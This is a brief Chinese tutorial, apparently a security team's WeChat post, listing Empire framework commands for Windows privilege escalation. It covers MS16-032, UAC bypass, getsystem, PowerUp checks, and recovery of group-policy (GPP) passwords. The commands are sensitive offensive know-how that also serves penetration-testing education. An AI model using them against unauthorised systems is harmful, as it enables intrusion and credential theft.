Empire提权模块基本都在usemodule privesc/模块下
一、溢出漏洞模块:
Empire自带了MS16-032、MS16-135(不稳定)
usemodule privesc/ms16-032set Listener <监听器名称>execute
二、bypass UAC:
①bypassuac
usemodule privesc/bypassuacset Listener <监听器名称>execute
提权成功会返回一个高权限的agents会话
或者直接进入某个agents,执行:
bypassuac <监听器名称>
②bypassuac_wscript(只适用于windows7)
usemodule privesc/bypassuac_wscriptset Listener <监听器名称>execute
提权成功会返回一个高权限的agents会话
直接执行getsystem就可以提权成功
usemodule privesc/getsystem*
可以看到现在的权限已经是system了。
三、Powerup模块:
Empire直接集成了powerup脚本,直接调用相关模块即可
usemodule privesc/powerup/ #tab键列出模块
①allchecks
usemodule privesc/powerup/allchecksexecute
根据AbuseFunction给出的利用方式进行利用即可,关于powerup在这不过多讲述,参考一下网上师傅们优秀的文章就好。
四、GPP组策略首选项提权模块:
usemodule privesc/gppexecute
有组策略的话就会返回xml文件中的账号密码,然后再进行后续利用即可。
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
本文始发于微信公众号(灼剑安全团队):Empire|04 Empire提权模块
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论